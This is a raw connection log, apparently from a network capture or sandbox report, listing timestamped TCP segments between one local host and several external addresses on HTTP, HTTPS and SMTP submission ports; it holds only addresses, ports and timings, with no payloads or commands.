                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:15.745100021 CET4983980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:15.750613928 CET8049839172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:15.750627041 CET8049839172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:16.215507984 CET8049839172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:16.215567112 CET4983980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:16.489435911 CET4983980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:16.497554064 CET8049839172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:16.575442076 CET4984480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:16.581381083 CET8049844172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:16.581702948 CET4984480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:16.597333908 CET4984480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:16.597368002 CET4984480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:16.606463909 CET8049844172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:16.606475115 CET8049844172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:17.078846931 CET8049844172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:17.078910112 CET4984480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:17.086546898 CET4984480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:17.091617107 CET8049844172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:17.411434889 CET4985080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:17.416513920 CET804985018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:17.416594982 CET4985080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:17.416853905 CET4985080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:17.416897058 CET4985080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:17.421945095 CET804985018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:17.421957016 CET804985018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:18.825320005 CET804985018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:18.825340033 CET804985018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:18.825406075 CET4985080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:21.286868095 CET4987280192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:21.294400930 CET804987254.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:21.295808077 CET4987280192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:21.297322035 CET4987280192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:21.297322035 CET4987280192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:21.304759026 CET804987254.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:21.304783106 CET804987254.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:22.013844967 CET804987254.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:22.013864040 CET804987254.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:22.013927937 CET4987280192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:22.047215939 CET4987280192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:22.052140951 CET804987254.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:22.297902107 CET4987880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:22.302779913 CET804987818.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:22.302846909 CET4987880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:22.322509050 CET4987880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:22.323448896 CET4987880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:22.331056118 CET804987818.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:22.331851959 CET804987818.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:23.710129976 CET804987818.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:23.710146904 CET804987818.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:23.710335970 CET4987880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.362582922 CET4987880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.368721008 CET804987818.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.530374050 CET4988880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.536449909 CET804988854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.536539078 CET4988880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.558749914 CET4988880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.558842897 CET4988880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.564980984 CET804988854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.565071106 CET804988854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.835270882 CET4988880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.942137003 CET4989480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.948849916 CET804989454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.948920965 CET4989480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.955837965 CET4989480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.955837965 CET4989480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.960841894 CET804989454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.960859060 CET804989454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.653485060 CET49900443192.168.2.5172.67.74.152
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.653533936 CET44349900172.67.74.152192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.653609037 CET49900443192.168.2.5172.67.74.152
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.655596972 CET49900443192.168.2.5172.67.74.152
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.655616045 CET44349900172.67.74.152192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.667771101 CET804989454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.667820930 CET804989454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.667876005 CET4989480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.675936937 CET4989480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.680737019 CET804989454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.841073990 CET4990180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.846730947 CET804990144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.848386049 CET4990180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.848561049 CET4990180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.848697901 CET4990180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.853396893 CET804990144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.853631020 CET804990144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.132276058 CET44349900172.67.74.152192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.132340908 CET49900443192.168.2.5172.67.74.152
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.136001110 CET49900443192.168.2.5172.67.74.152
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.136010885 CET44349900172.67.74.152192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.136293888 CET44349900172.67.74.152192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.187454939 CET49900443192.168.2.5172.67.74.152
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.231338978 CET44349900172.67.74.152192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.297063112 CET44349900172.67.74.152192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.297157049 CET44349900172.67.74.152192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.297465086 CET49900443192.168.2.5172.67.74.152
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.313277960 CET49900443192.168.2.5172.67.74.152
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.332681894 CET804990144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.332839966 CET804990144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.332894087 CET4990180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.357625008 CET4990180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.362689018 CET804990144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.557272911 CET4990780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.562303066 CET8049907172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.562388897 CET4990780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.565665960 CET4990780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.565665960 CET4990780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.570707083 CET8049907172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.570730925 CET8049907172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.053684950 CET8049907172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.054368019 CET4990780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.133711100 CET4990780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.140731096 CET8049907172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.357269049 CET4991280192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.364352942 CET8049912172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.364422083 CET4991280192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.367327929 CET4991280192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.367327929 CET4991280192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.374283075 CET8049912172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.374444962 CET8049912172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.423280954 CET4985080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.858709097 CET8049912172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.858788013 CET4991280192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.858829975 CET4991280192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.866627932 CET8049912172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.940220118 CET4991480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.945256948 CET804991418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.945475101 CET4991480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.945475101 CET4991480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.945475101 CET4991480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.950393915 CET804991418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.950404882 CET804991418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.359961987 CET804991418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.360025883 CET804991418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.360389948 CET4991480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.360485077 CET4991480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.365362883 CET804991418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.696568966 CET4992580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.704225063 CET804992582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.704308987 CET4992580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.709470987 CET4992580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.709494114 CET4992580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.717371941 CET804992582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.717385054 CET804992582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.728566885 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.735843897 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.736205101 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.494328022 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.494544029 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.499407053 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.681730032 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.681977987 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.687107086 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.870675087 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.871189117 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:30.876166105 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.069087029 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.069112062 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.069123983 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.069226027 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.071588993 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.078571081 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.260253906 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.264681101 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.271531105 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.451165915 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.462101936 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.467004061 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.651701927 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.652410984 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.663172007 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.851701975 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.852292061 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:31.857332945 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.039088964 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.039355993 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.044228077 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.231213093 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.231442928 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.236450911 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.419730902 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.430525064 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.430613041 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.430640936 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.430665016 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.438774109 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.438792944 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.438802958 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.710812092 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.761594057 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.796344042 CET4992580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.813613892 CET4995080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.818597078 CET804995082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.818727016 CET4995080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.818851948 CET4995080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.818862915 CET4995080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.823782921 CET804995082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.823800087 CET804995082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.892328978 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.899961948 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:33.080282927 CET5874992651.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:33.080980062 CET49926587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:33.082040071 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:33.087080002 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:33.087249994 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:33.829225063 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:33.843178034 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:33.848078966 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.026179075 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.030335903 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.035286903 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.211302042 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.211842060 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.216893911 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.401724100 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.401870966 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.401885033 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.401932001 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.403935909 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.411133051 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.586982012 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.588373899 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.595917940 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.769275904 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.769553900 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.775279999 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.951059103 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.951330900 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:34.956291914 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.137931108 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.138159990 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.144937992 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.326802015 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.327023983 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.332077980 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.512717962 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.512898922 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.517889977 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.693423986 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.698293924 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.698293924 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.698352098 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.698352098 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.699234009 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.699234009 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.699338913 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.699354887 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.699354887 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.699387074 CET49953587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.703288078 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.703334093 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.704158068 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.704250097 CET5874995351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:35.704262972 CET5874995351.195.88.199192.168.2.5
